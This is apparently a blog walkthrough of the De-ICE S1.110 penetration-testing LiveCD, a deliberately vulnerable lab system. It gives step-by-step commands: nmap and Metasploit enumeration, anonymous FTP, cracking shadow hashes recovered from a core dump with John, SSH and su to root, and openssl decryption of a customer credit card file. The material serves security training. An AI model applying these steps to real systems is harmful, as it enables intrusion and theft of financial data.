While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso
Default IP 192.168.1.110
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information
Spoilers and Walkthrough
Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.
ifconfig eth0 192.168.XX.110/24 route add default gw 192.168.XX.2
Port Scan the System –
nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110
Hitting it with a version scan to determine what is running. We are going to output the file as xml and practice using the metasploit database. You can run it all from inside nmap using the db_nmap command and then normal nmap switches but I’m showing you the import function.
msfconsole workspace -a deice workspace deice
This creates a database named deice and sets it as the current working
db_import /root/Desktop/deice110 hosts
You should see the 110 address. WooHoo!
There should be four ports open. Go check out the website because it has info you need.
I love me some FTP, I really love anonymous FTP
Use either use the command line to get access to ftp or filezilla.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.
Running john against it:
john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow
john returned a password but it didn’t work.
There is a passwd file in dowload/opt/cygwin/etc but no shadow file so moving along
What is the core file in download/etc?
file core core: ELF 32-bit LSB core file Intel 80386....
Better Google that it is a linux core dump file…go read some on that we’ll wait.
The end looks like a dump of a shadow file
strings core > /root/desktop/deice/coredump
This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.
john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow
This gives us the following users root, bbanter. SSH to the system and get root.
ssh to the box as bbanter ssh email@example.com su -
From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.
cd / find -iname *.enc
That pukes back a lot of things but look at:
Jump back to the openssl decrypt if you need help:
openssl list-cipher-commands openssl enc -aes-128-cbc-d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv
WAIT NO JOY!
Lets go look at the /home/root/.save folder
cd /home/root/.save ls
Look at the copy.sh script
This is the script that encrypted the file, the pass is in the “file” section. Lets decrypt it now:
openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw cat customer_account.csv
BOOM you’re done. Openssl is a pain but now you’re a pro.